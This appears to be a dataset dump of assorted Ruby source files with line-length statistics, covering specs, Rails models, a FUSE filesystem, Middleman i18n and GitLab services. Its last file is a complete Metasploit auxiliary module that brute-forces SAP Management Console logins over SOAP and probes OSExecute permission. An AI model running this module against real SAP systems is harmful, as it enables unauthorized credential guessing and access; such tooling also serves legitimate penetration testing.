hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
bbb14cd25ba42039e50701b0fabfbd6929c8ff9b | 1,261 | # frozen_string_literal: true
require "regexer"
require "./spec/shared_examples/shared_examples_for_contains_test"
RSpec.describe "Regexer::Pattern #starts_with" do
let(:val) { nil }
let(:pattern_block) do
lambda do |value|
-> { starts_with value }
end.call(val)
end
subject(:pattern) do
Regexer::PatternBuilder.new(&pattern_block).result.regex
end
# NOTE: Under the hood, starts_with method actually uses the contains method
include_examples "contains method test examples", [
{
case: "when value is an exact integer: 26543",
test_value: 26_543,
expected_value: /^(26543)/
},
{
case: "when value is an exact float: 3.56",
test_value: 3.56,
expected_value: /^(3\.56)/
},
{
case: "when value is an exact set of characters: 'testing'",
test_value: "testing",
expected_value: /^(testing)/
},
{
case: "when value contains regex special characters",
test_value: ".+*?^$()[]{}|\\",
custom_assertion_message: "escapes those special characters in the final generated pattern",
expected_value: /^(\.\+\*\?\^\$\(\)\[\]\{\}\|\\)/
}
]
include_examples "contains method invalid value error test example", value: /test/
end
| 28.022222 | 98 | 0.638382 |
f7046ba085c78420881a0f530e9c92fd4210bde5 | 149 | class Image < ActiveRecord::Base
self.table_name = 'sir_trevor_images'
mount_uploader :file, ImageUploader
validates :file, :presence => true
end | 29.8 | 39 | 0.778523 |
117a3774110bf98fd8dc7176fe6057ec18d29c57 | 9,175 | #encoding:utf-8
testfs_dir = File.expand_path(File.dirname(__FILE__))
require File.expand_path(File.join(testfs_dir, '/data_structure/inode.rb'))
require File.expand_path(File.join(testfs_dir, '/data_structure/dir_entry.rb'))
require File.expand_path(File.join(testfs_dir, '/data_structure/file_data.rb'))
require File.expand_path(File.join(testfs_dir, '/cache/inode_cache_manager.rb'))
require File.expand_path(File.join(testfs_dir, '/cache/dir_cache_manager.rb'))
require 'rbfuse'
module TestFS
class FSCore < RbFuse::FuseDir
def initialize(config, option)
if option[:p2p].nil?
require File.expand_path(File.join(File.expand_path(File.dirname(__FILE__)), '/hash_table/local_hash.rb'))
@table = HashTable.new(LocalHashTable.new)
else
require File.expand_path(File.join(File.expand_path(File.dirname(__FILE__)), '/hash_table/distributed_hash.rb'))
@table = HashTable.new(DistributedHashTable.new(option[:p2p]))
end
@inode_cache = InodeCacheManager.new(100)
@dir_cache = DirCacheManager.new(100)
@open_entries = {}
create_root_dir
end
def open(path, mode, handle)
buf = nil
buf = get_file(path).value if mode =~ /r/
buf ||= ""
buf.encode("ASCII-8bit")
@open_entries[handle] = [mode, buf]
return true
end
def read(path, off, size, handle)
@open_entries[handle][1][off, size]
end
def write(path, off, buf, handle)
@open_entries[handle][1][off, buf.bytesize] = buf
end
def close(path, handle)
return nil unless @open_entries[handle]
set_file(path, @open_entries[handle][1])
@open_entries.delete(handle)
end
def stat(path)
getattr(path)
end
def delete(path)
delete_file(path)
end
def readdir(path)
entry = dir_entries(path)
return entry.nil? ? [] : entry
end
def getattr(path)
filename = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(filename)
uuid = current_dir[filename]
inode = get_inode(uuid)
if inode.type == :file
stat = RbFuse::Stat.file
stat.size = inode.size
return stat
elsif inode.type == :dir
return RbFuse::Stat.dir
else
return nil
end
end
end
def unlink(path)
delete_file(path)
true
end
def mkdir(path, mode)
set_dir(path, DirEntry.new)
return true
end
def rmdir(path)
basename = File.basename(path)
current_dir = get_dir_entry(path)
deldir_inode = get_inode(current_dir[basename])
remove_lower_dir(deldir_inode)
current_dir.delete(basename)
store_hash_table(current_dir.uuid, current_dir)
@dir_cache.delete(deldir_inode.pointer)
@inode_cache.delete(deldir_inode.ino)
return true
end
def rename(path, destpath)
parent_entry = get_dir_entry(path)
target_uuid = parent_entry[File.basename(path)]
parent_entry.delete(File.basename(path))
store_hash_table(parent_entry.uuid, parent_entry)
@dir_cache.store(parent_entry)
newparent_entry = get_dir_entry(destpath)
newparent_entry.store(File.basename(destpath), target_uuid)
store_hash_table(newparent_entry.uuid, newparent_entry)
@dir_cache.store(newparent_entry)
return true
end
def directory?(path)
dirname = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(dirname)
uuid = current_dir[dirname]
inode = get_inode(uuid)
return true if inode.type == :dir
end
return false
end
private
# ハッシュテーブルに key, value を保存する
# @param [String] key Value に対応付けるキー
# @param [Object] value Key に対応付けられたオブジェクト
def store_hash_table(key, value)
@table.store(key, value)
end
# ハッシュテーブルからオブジェクトを取得する
# @param [String] key Value に対応付けられたキー
# @return [Object] Key に対応付けられたオブジェクト
def get_hash_table(key)
return @table.get(key)
end
# ハッシュテーブルからオブジェクトを削除する
# @param [String] key Value に対応付けられたキー
def delete_hash_table(key)
@table.delete(key)
end
# ディレクトリ内のエントリ一覧を返す
# @param [String] path 対象ディレクトリのパス
# @return [Array] ディレクトリ内のファイル名一覧
def dir_entries(path)
current_dir = get_dir_entry(path, false)
return current_dir.keys
end
# ディレクトリエントリを取得する
# @param [String] path 対象のディレクトリを指すパス
# @param [boolean] split_path 引数で渡したパスを basename と dirname に分割する場合 true
# @return [DirEntry] ディレクトリエントリ
def get_dir_entry(path, split_path = true)
path = File.dirname(path) if split_path == true
root_inode = get_inode("2")
current_dir = get_dir(root_inode.pointer)
if path != '/'
splited_path = path.split("/").reject{|x| x == "" }
splited_path.each do |dir|
return nil unless current_dir.has_key?(dir)
current_inode = get_inode(current_dir[dir])
current_dir = get_dir(current_inode.pointer)
end
end
return current_dir
end
# 指定したディレクトリの子ディレクトリの内容を再帰的に削除する
# @param [Inode] deldir_inode 対象のディレクトリの inode
def remove_lower_dir(deldir_inode)
dir_entry = get_hash_table(deldir_inode.pointer)
dir_entry.each do |entry, uuid|
inode = get_inode(uuid)
remove_lower_dir(inode) if inode.type == :dir
delete_hash_table(uuid)
delete_hash_table(inode.pointer)
@inode_cache.delete(uuid)
@dir_cache.delete(inode.pointer)
end
delete_hash_table(deldir_inode.ino)
delete_hash_table(dir_entry.uuid)
@inode_cache.delete(deldir_inode.ino)
@dir_cache.delete(dir_entry.uuid)
end
# ルートディレクトリの inode と ディレクトリエントリを作成する
def create_root_dir
inode = Inode.new(:dir, "2")
dir_entry = DirEntry.new
inode.pointer = dir_entry.uuid
store_hash_table(inode.ino, inode)
store_hash_table(dir_entry.uuid, dir_entry)
@inode_cache.store(inode)
@dir_cache.store(dir_entry)
end
# ディレクトリの inode と ディレクトリエントリを作成する
# @param [String] path 作成するディレクトリのパス
# @param [DirEntry] dest_dir ディレクトリエントリ
# @return [boolean]
def set_dir(path, dest_dir)
dest_dir_name = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(dest_dir_name)
samename_uuid = current_dir[dest_dir_name]
samename_inode = get_inode(samename_uuid)
return false if samename_inode.type == :dir
end
dest_inode = Inode.new(:dir)
dest_inode.pointer = dest_dir.uuid
store_hash_table(dest_inode.ino, dest_inode)
store_hash_table(dest_dir.uuid, dest_dir)
current_dir.store(dest_dir_name, dest_inode.ino)
store_hash_table(current_dir.uuid, current_dir)
@inode_cache.store(dest_inode)
@dir_cache.store(dest_dir)
@dir_cache.store(current_dir)
return true
end
# ファイルの実体を取得する
# @param [String] path 対象のファイルのパス
# @return [FileData]
def get_file(path)
filename = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(filename)
uuid = current_dir[filename]
inode = get_inode(uuid)
filedata = get_hash_table(inode.pointer)
return filedata
end
return nil
end
# ファイルの inode と ファイルの実体を作成する
# @param [String] path 対象のファイルのパス
# @param [String] str 作成するファイルの内容を表すバイト列
def set_file(path, str)
filename = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(filename)
inode = get_inode(current_dir[filename])
file_data = get_hash_table(inode.pointer)
else
file_data = FileData.new
inode = Inode.new(:file)
inode.pointer = file_data.uuid
end
file_data.value = str
inode.size = str.bytesize
store_hash_table(inode.ino, inode)
store_hash_table(file_data.uuid, file_data)
current_dir.store(filename, inode.ino)
store_hash_table(current_dir.uuid, current_dir)
@inode_cache.store(inode)
@dir_cache.store(current_dir)
return true
end
# ファイルを削除する
# @param [String] path 対象のファイルのパス
# @return [boolean]
def delete_file(path)
filename = File.basename(path)
current_dir = get_dir_entry(path)
if current_dir.has_key?(filename)
uuid = current_dir[filename]
inode = get_inode(uuid)
current_dir.delete(filename)
store_hash_table(current_dir.uuid, current_dir)
delete_hash_table(uuid)
delete_hash_table(inode.pointer)
@inode_cache.delete(uuid)
@dir_cache.delete(inode.pointer)
return true
end
return false
end
def get_inode(uuid)
if @inode_cache.has_cache?(uuid)
return @inode_cache.get(uuid)
else
return get_hash_table(uuid)
end
end
def get_dir(uuid)
if @dir_cache.has_cache?(uuid)
return @dir_cache.get(uuid)
else
return get_hash_table(uuid)
end
end
end
end
| 27.552553 | 120 | 0.658093 |
1da439046ea6e288520587c613d8148fb92e3e71 | 43 | '1234'.succ #=> '1235'
'99'.succ #=> '100'
| 14.333333 | 22 | 0.488372 |
ffa0e81095d8f6f5d3600c9fe7430c748f689e93 | 470 | cask 'pgweb' do
version '0.9.8'
sha256 '07b1240f07fd826fb4987b4cc1859d5baf007b80f63602c58101f0437001d9f8'
url "https://github.com/sosedoff/pgweb/releases/download/v#{version}/pgweb_darwin_amd64.zip"
appcast 'https://github.com/sosedoff/pgweb/releases.atom',
checkpoint: 'd86058f025c53c9def9b11b905cc9ce05f73c16055614c717c536363c612298b'
name 'pgweb'
homepage 'https://github.com/sosedoff/pgweb'
binary 'pgweb_darwin_amd64', target: 'pgweb'
end
| 36.153846 | 94 | 0.782979 |
d5dec8e20a606a540d8d08bba599795384f9ed7d | 6,133 | class Middleman::CoreExtensions::Internationalization < ::Middleman::Extension
option :no_fallbacks, false, 'Disable I18n fallbacks'
option :langs, nil, 'List of langs, will autodiscover by default'
option :lang_map, {}, 'Language shortname map'
option :path, '/:locale/', 'URL prefix path'
option :templates_dir, 'localizable', 'Location of templates to be localized'
option :mount_at_root, nil, 'Mount a specific language at the root of the site'
option :data, 'locales', 'The directory holding your locale configurations'
def after_configuration
# See https://github.com/svenfuchs/i18n/wiki/Fallbacks
unless options[:no_fallbacks]
require 'i18n/backend/fallbacks'
::I18n::Backend::Simple.send(:include, ::I18n::Backend::Fallbacks)
end
locales_file_path = options[:data]
# Tell the file watcher to observe the :data_dir
app.files.watch :locales,
path: File.join(app.root, locales_file_path),
ignore: proc { |f| !(/.*(rb|yml|yaml)$/.match(f[:relative_path])) }
# Setup data files before anything else so they are available when
# parsing config.rb
app.files.on_change(:locales, &method(:on_file_changed))
@maps = {}
@mount_at_root = options[:mount_at_root].nil? ? langs.first : options[:mount_at_root]
# Don't output localizable files
app.ignore File.join(options[:templates_dir], '**')
configure_i18n
logger.info "== Locales: #{langs.join(', ')} (Default #{@mount_at_root})"
end
helpers do
def t(*args)
::I18n.t(*args)
end
def locate_partial(partial_name)
locals_dir = extensions[:i18n].options[:templates_dir]
# Try /localizable
partials_path = File.join(locals_dir, partial_name)
lang_suffix = current_resource.metadata[:locals] && current_resource.metadata[:locals][:lang]
extname = File.extname(partial_name)
maybe_static = extname.length > 0
suffixed_partial_name = if maybe_static
partial_name.sub(extname, ".#{lang_suffix}#{extname}")
else
"#{partial_name}.#{lang_suffix}"
end
if lang_suffix
super(suffixed_partial_name) ||
super(File.join(locals_dir, suffixed_partial_name)) ||
super(partials_path) ||
super
else
super(partials_path) ||
super
end
end
end
Contract None => ArrayOf[Symbol]
def langs
@langs ||= known_languages
end
# Update the main sitemap resource list
# @return Array<Middleman::Sitemap::Resource>
Contract ResourceList => ResourceList
def manipulate_resource_list(resources)
new_resources = []
resources.each do |resource|
# If it uses file extension localization
if result = parse_locale_extension(resource.path)
ext_lang, path, page_id = result
new_resources << build_resource(path, resource.path, page_id, ext_lang)
# If it's a "localizable template"
elsif File.fnmatch?(File.join(options[:templates_dir], '**'), resource.path)
page_id = File.basename(resource.path, File.extname(resource.path))
langs.each do |lang|
# Remove folder name
path = resource.path.sub(options[:templates_dir], '')
new_resources << build_resource(path, resource.path, page_id, lang)
end
end
# This is for backwards compatibility with the old provides_metadata-based code
# that used to be in this extension, but I don't know how much sense it makes.
next if resource.options[:lang]
resource.add_metadata options: { lang: @mount_at_root }, locals: { lang: @mount_at_root }
end
resources + new_resources
end
private
Contract Any, Any => Any
def on_file_changed(_updated_files, _removed_files)
@_langs = nil # Clear langs cache
# TODO, add new file to ::I18n.load_path
::I18n.reload!
end
def configure_i18n
::I18n.load_path += app.files.by_type(:locales).files.map { |p| p[:full_path].to_s }
::I18n.reload!
::I18n.default_locale = @mount_at_root
# Reset fallbacks to fall back to our new default
::I18n.fallbacks = ::I18n::Locale::Fallbacks.new if ::I18n.respond_to?(:fallbacks)
end
Contract None => ArrayOf[Symbol]
def known_languages
if options[:langs]
Array(options[:langs]).map(&:to_sym)
else
known_langs = app.files.by_type(:locales).files.select do |p|
p[:relative_path].to_s.split(File::SEPARATOR).length == 1
end
known_langs.map { |p|
File.basename(p[:relative_path].to_s).sub(/\.ya?ml$/, '').sub(/\.rb$/, '')
}.sort.map(&:to_sym)
end
end
# Parse locale extension filename
# @return [lang, path, basename]
# will return +nil+ if no locale extension
Contract String => Maybe[[Symbol, String, String]]
def parse_locale_extension(path)
path_bits = path.split('.')
return nil if path_bits.size < 3
lang = path_bits.delete_at(-2).to_sym
return nil unless langs.include?(lang)
path = path_bits.join('.')
basename = File.basename(path_bits[0..-2].join('.'))
[lang, path, basename]
end
Contract String, String, String, Symbol => IsA['Middleman::Sitemap::Resource']
def build_resource(path, source_path, page_id, lang)
old_locale = ::I18n.locale
::I18n.locale = lang
localized_page_id = ::I18n.t("paths.#{page_id}", default: page_id, fallback: [])
prefix = if (options[:mount_at_root] == lang) || (options[:mount_at_root].nil? && langs[0] == lang)
'/'
else
replacement = options[:lang_map].fetch(lang, lang)
options[:path].sub(':locale', replacement.to_s)
end
# path needs to be changed if file has a localizable extension. (options[mount_at_root] == lang)
path = ::Middleman::Util.normalize_path(
File.join(prefix, path.sub(page_id, localized_page_id))
)
path = path.sub(options[:templates_dir] + '/', '')
p = ::Middleman::Sitemap::ProxyResource.new(app.sitemap, path, source_path)
p.add_metadata locals: { lang: lang, page_id: path }, options: { lang: lang }
::I18n.locale = old_locale
p
end
end
| 32.973118 | 103 | 0.662971 |
5dbd1990896d3d6fa7267c721fc62d32ff0b59ae | 800 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
10.times do |i|
User.create!(
first_name: Faker::Name.first_name,
last_name: Faker::Name.last_name,
email: Faker::Internet.email,
avatar: Faker::Avatar.image,
password: '123123'
)
end
20.times do |i|
Message.create(
title: Faker::Job.title,
body: Faker::ChuckNorris.fact,
sender_id: Faker::Number.between(1, 10),
recipient_id: Faker::Number.between(1, 10),
)
end | 26.666667 | 111 | 0.6675 |
08a3adce8ccb9e1b691b50f8a4408df7b296dda9 | 86 | require 'angular/ngt/version'
require 'angular/ngt/engine'
require 'angular/ngt/haml'
| 21.5 | 29 | 0.790698 |
6aa94f7b20b1b35500ee84842becef0510bc846a | 396 | # frozen_string_literal: true
class AddIndexToCountPendingMirrorUpdates < ActiveRecord::Migration[5.1]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
disable_ddl_transaction!
def up
add_concurrent_index :project_mirror_data, [:last_update_at, :retry_count]
end
def down
remove_concurrent_index :project_mirror_data, [:last_update_at, :retry_count]
end
end
| 22 | 81 | 0.790404 |
e925b4df8ed1d8c754a17f6d582c2b6ac0f420c8 | 5,259 | require 'test_helper'
class Kaui::BundlesControllerTest < Kaui::FunctionalTestHelper
test 'should be redirected if an invalid account id was specified in index screen' do
account_id = SecureRandom.uuid.to_s
get :index, :account_id => account_id
assert_redirected_to account_path(account_id)
assert_equal "Error while communicating with the Kill Bill server: Object id=#{account_id} type=ACCOUNT doesn't exist!", flash[:error]
end
test 'should get index with existing tags' do
tag_definition_ids = []
def1 = create_tag_definition(SecureRandom.uuid.to_s[0..19], @tenant);
tag_definition_ids << def1
tag_definition_ids << def1
def2 = create_tag_definition(SecureRandom.uuid.to_s[0..19], @tenant);
tag_definition_ids << def2
add_tags(@bundle, tag_definition_ids, @tenant);
get :index, :account_id => @bundle.account_id
assert_response 200
assert_not_nil assigns(:account)
assert_not_nil assigns(:bundles)
assert_not_nil assigns(:tags_per_bundle)
assert_equal 2, assigns(:tags_per_bundle)[@bundle.bundle_id].size
end
test 'should handle Kill Bill errors during transfer' do
post :do_transfer, :id => @bundle.bundle_id
assert_redirected_to home_path
assert_equal 'Required parameter missing: new_account_key', flash[:error]
new_account_key = SecureRandom.uuid.to_s
post :do_transfer, :id => @bundle.bundle_id, :new_account_key => new_account_key
assert_redirected_to home_path
assert_equal "Error while communicating with the Kill Bill server: Object id=#{new_account_key} type=ACCOUNT doesn't exist!", flash[:error]
bundle_id = SecureRandom.uuid.to_s
post :do_transfer, :id => bundle_id, :new_account_key => @account2.external_key
assert_redirected_to home_path
assert_equal "Error while communicating with the Kill Bill server: Object id=#{bundle_id} type=BUNDLE doesn't exist!", flash[:error]
end
test 'should get transfer' do
get :transfer, :id => @bundle.bundle_id
assert_response 200
assert_not_nil assigns(:bundle_id)
end
test 'should transfer bundle default policy' do
check_bundle_owner(@account.account_id)
post :do_transfer,
:id => @bundle.bundle_id,
:new_account_key => @account2.external_key
assert_redirected_to account_bundles_path(@account2.account_id)
assert_equal 'Bundle was successfully transferred', flash[:notice]
check_bundle_owner(@account2.account_id)
end
test 'should transfer bundle immediately' do
check_bundle_owner(@account.account_id)
post :do_transfer,
:id => @bundle.bundle_id,
:new_account_key => @account2.external_key,
:billing_policy => 'IMMEDIATE'
assert_redirected_to account_bundles_path(@account2.account_id)
assert_equal 'Bundle was successfully transferred', flash[:notice]
check_bundle_owner(@account2.account_id)
end
test 'should expose restful endpoint' do
get :restful_show, :id => @bundle.bundle_id
assert_redirected_to account_bundles_path(@bundle.account_id)
get :restful_show, :id => @bundle.external_key
assert_redirected_to account_bundles_path(@bundle.account_id)
end
test 'should get pause_resume ' do
get :pause_resume, :id => @bundle.bundle_id
assert_response :success
assert has_input_field('pause_requested_date')
assert has_input_field('resume_requested_date')
end
test 'should put bundle on pause and resume' do
expected_response_path = "/accounts/#{@account.account_id}/bundles"
bundle = create_bundle(@account, @tenant)
# put bundle on pause
put :do_pause_resume, :id => bundle.bundle_id,:account_id => @account.account_id, :pause_requested_date => DateTime.now.strftime('%F')
assert_response :redirect
assert_equal 'Bundle was successfully paused', flash[:notice]
# validate redirect path
assert response_path.include?(expected_response_path), "#{response_path} is expected to contain #{expected_response_path}"
# resume bundle on pause
put :do_pause_resume, :id => bundle.bundle_id,:account_id => @account.account_id, :resume_requested_date => DateTime.now.strftime('%F')
assert_response :redirect
assert_equal 'Bundle was successfully resumed', flash[:notice]
# validate redirect path
assert response_path.include?(expected_response_path), "#{response_path} is expected to contain #{expected_response_path}"
end
private
def create_tag_definition(tag_definition_name, tenant, username = USERNAME, password = PASSWORD, reason = nil, comment = nil)
input = Kaui::TagDefinition.new(tag_definition_name)
input.name = tag_definition_name
input.description = 'something'
input.applicable_object_types = ['BUNDLE']
tag_def = input.create(username, reason, comment, build_options(tenant, username, password))
tag_def.id
end
def add_tags(bundle, tag_definition_ids, tenant, username = USERNAME, password = PASSWORD, reason = nil, comment = nil)
bundle.set_tags(tag_definition_ids, username, reason, comment, build_options(tenant, username, password))
end
def check_bundle_owner(new_owner)
assert_equal new_owner, Kaui::Bundle.find_by_external_key(@bundle.external_key, false, options).account_id
end
end
| 40.145038 | 143 | 0.74729 |
38359470e3e7a9e75ea8eae63dc2381d025a6c99 | 1,055 | module TD::Types
# Describes a poll.
#
# @attr id [Integer] Unique poll identifier.
# @attr question [String] Poll question, 1-255 characters.
# @attr options [Array<TD::Types::PollOption>] List of poll answer options.
# @attr total_voter_count [Integer] Total number of voters, participating in the poll.
# @attr recent_voter_user_ids [Array<Integer>] User identifiers of recent voters, if the poll is non-anonymous.
# @attr is_anonymous [Bool] True, if the poll is anonymous.
# @attr type [TD::Types::PollType] Type of the poll.
# @attr is_closed [Boolean] True, if the poll is closed.
class Poll < Base
# attribute :id, TD::Types::Integer
# attribute :question, TD::Types::String
# attribute :options, TD::Types::Array.of(TD::Types::PollOption)
# attribute :total_voter_count, TD::Types::Integer
attribute :recent_voter_user_ids, TD::Types::Array.of(TD::Types::Integer)
attribute :is_anonymous, TD::Types::Bool
attribute :type, TD::Types::PollType
# attribute :is_closed, TD::Types::Bool
end
end
| 45.869565 | 113 | 0.708057 |
d5a0a2dd88564e614d48e4bcdac9100e40096d0b | 5,857 | # frozen_string_literal: true
module Ci
module JobArtifacts
class DestroyBatchService
include BaseServiceUtility
include ::Gitlab::Utils::StrongMemoize
# Danger: Private - Should only be called in Ci Services that pass a batch of job artifacts
# Not for use outside of the Ci:: namespace
# Adds the passed batch of job artifacts to the `ci_deleted_objects` table
# for asyncronous destruction of the objects in Object Storage via the `Ci::DeleteObjectsService`
# and then deletes the batch of related `ci_job_artifacts` records.
# Params:
# +job_artifacts+:: A relation of job artifacts to destroy (fewer than MAX_JOB_ARTIFACT_BATCH_SIZE)
# +pick_up_at+:: When to pick up for deletion of files
# Returns:
# +Hash+:: A hash with status and destroyed_artifacts_count keys
def initialize(job_artifacts, pick_up_at: nil, fix_expire_at: fix_expire_at?)
@job_artifacts = job_artifacts.with_destroy_preloads.to_a
@pick_up_at = pick_up_at
@fix_expire_at = fix_expire_at
end
# rubocop: disable CodeReuse/ActiveRecord
def execute(update_stats: true)
# Detect and fix artifacts that had `expire_at` wrongly backfilled by migration
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47723
detect_and_fix_wrongly_expired_artifacts
return success(destroyed_artifacts_count: 0, statistics_updates: {}) if @job_artifacts.empty?
destroy_related_records(@job_artifacts)
Ci::DeletedObject.transaction do
Ci::DeletedObject.bulk_import(@job_artifacts, @pick_up_at)
Ci::JobArtifact.id_in(@job_artifacts.map(&:id)).delete_all
end
after_batch_destroy_hook(@job_artifacts)
# This is executed outside of the transaction because it depends on Redis
update_project_statistics! if update_stats
increment_monitoring_statistics(artifacts_count, artifacts_bytes)
success(destroyed_artifacts_count: artifacts_count,
statistics_updates: affected_project_statistics)
end
# rubocop: enable CodeReuse/ActiveRecord
private
# Overriden in EE
def destroy_related_records(artifacts); end
# Overriden in EE
def after_batch_destroy_hook(artifacts); end
# using ! here since this can't be called inside a transaction
def update_project_statistics!
affected_project_statistics.each do |project, delta|
project.increment_statistic_value(Ci::JobArtifact.project_statistics_name, delta)
end
end
def affected_project_statistics
strong_memoize(:affected_project_statistics) do
artifacts_by_project = @job_artifacts.group_by(&:project)
artifacts_by_project.each.with_object({}) do |(project, artifacts), accumulator|
delta = -artifacts.sum { |artifact| artifact.size.to_i }
accumulator[project] = delta
end
end
end
def increment_monitoring_statistics(size, bytes)
metrics.increment_destroyed_artifacts_count(size)
metrics.increment_destroyed_artifacts_bytes(bytes)
end
def metrics
@metrics ||= ::Gitlab::Ci::Artifacts::Metrics.new
end
def artifacts_count
strong_memoize(:artifacts_count) do
@job_artifacts.count
end
end
def artifacts_bytes
strong_memoize(:artifacts_bytes) do
@job_artifacts.sum { |artifact| artifact.try(:size) || 0 }
end
end
# This detects and fixes job artifacts that have `expire_at` wrongly backfilled by the migration
# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/47723.
# These job artifacts will not be deleted and will have their `expire_at` removed.
#
# The migration would have backfilled `expire_at`
# to midnight on the 22nd of the month of the local timezone,
# storing it as UTC time in the database.
#
# If the timezone setting has changed since the migration,
# the `expire_at` stored in the database could have changed to a different local time other than midnight.
# For example:
# - changing timezone from UTC+02:00 to UTC+02:30 would change the `expire_at` in local time 00:00:00 to 00:30:00.
# - changing timezone from UTC+00:00 to UTC-01:00 would change the `expire_at` in local time 00:00:00 to 23:00:00 on the previous day (21st).
#
# Therefore job artifacts that have `expire_at` exactly on the 00, 30 or 45 minute mark
# on the dates 21, 22, 23 of the month will not be deleted.
# https://en.wikipedia.org/wiki/List_of_UTC_time_offsets
def detect_and_fix_wrongly_expired_artifacts
return unless @fix_expire_at
wrongly_expired_artifacts, @job_artifacts = @job_artifacts.partition { |artifact| wrongly_expired?(artifact) }
remove_expire_at(wrongly_expired_artifacts)
end
def fix_expire_at?
Feature.enabled?(:ci_detect_wrongly_expired_artifacts, default_enabled: :yaml)
end
def wrongly_expired?(artifact)
return false unless artifact.expire_at.present?
match_date?(artifact.expire_at) && match_time?(artifact.expire_at)
end
def match_date?(expire_at)
[21, 22, 23].include?(expire_at.day)
end
def match_time?(expire_at)
%w[00:00.000 30:00.000 45:00.000].include?(expire_at.strftime('%M:%S.%L'))
end
def remove_expire_at(artifacts)
Ci::JobArtifact.id_in(artifacts).update_all(expire_at: nil)
Gitlab::AppLogger.info(message: "Fixed expire_at from artifacts.", fixed_artifacts_expire_at_count: artifacts.count)
end
end
end
end
Ci::JobArtifacts::DestroyBatchService.prepend_mod_with('Ci::JobArtifacts::DestroyBatchService')
| 38.788079 | 147 | 0.697115 |
114d6758d9125db7ac479fb03a5e48e821d1eb99 | 5,355 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'SAP Management Console Brute Force',
'Description' => %q{
This module simply attempts to brute force the username and
password for the SAP Management Console SOAP Interface. If
the SAP_SID value is set it will replace instances of <SAPSID>
in any user/pass from any wordlist.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('SAP_SID', [false, 'Input SAP SID to attempt brute-forcing standard SAP accounts ', nil]),
OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "sap_common.txt") ])
], self.class)
register_autofilter_ports([ 50013 ])
end
def run_host(rhost)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'
})
if not res
print_error("#{peer} [SAP] Unable to connect")
return
end
print_status("SAPSID set to '#{datastore['SAP_SID']}'") if datastore['SAP_SID']
each_user_pass do |user, pass|
enum_user(user,pass,uri)
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def enum_user(user, pass, uri)
# Replace placeholder with SAP SID, if present
if datastore['SAP_SID']
user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
end
print_status("Trying username:'#{user}' password:'#{pass}'")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:OSExecute'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><command>hostname</command><async>0</async></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
user_pass = Rex::Text.encode_base64(user + ":" + pass)
begin
res = send_request_raw({
'uri' => uri,
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
'Authorization' => 'Basic ' + user_pass
}
})
return unless res
if (res.code != 500 and res.code != 200)
return
else
body = res.body
if body.match(/Invalid Credentials/i)
success = false
else
success = true
if body.match(/Permission denied/i)
permission = false
end
if body.match(/OSExecuteResponse/i)
permission = true
end
end
end
rescue ::Rex::ConnectionError
print_error("#{peer} [SAP] Unable to connect")
return
end
if success
print_good("#{peer} [SAP] Successful login '#{user}' password: '#{pass}'")
if permission
vprint_good("#{peer} [SAP] Login '#{user}' authorized to perform OSExecute calls")
else
vprint_error("#{peer} [SAP] Login '#{user}' NOT authorized to perform OSExecute calls")
end
report_cred(
ip: rhost,
port: port,
user: user,
password: pass,
service_name: 'sap-managementconsole',
proof: res.body
)
else
vprint_error("#{peer} [SAP] failed to login as '#{user}':'#{pass}'")
end
end
end
| 29.262295 | 122 | 0.571055 |
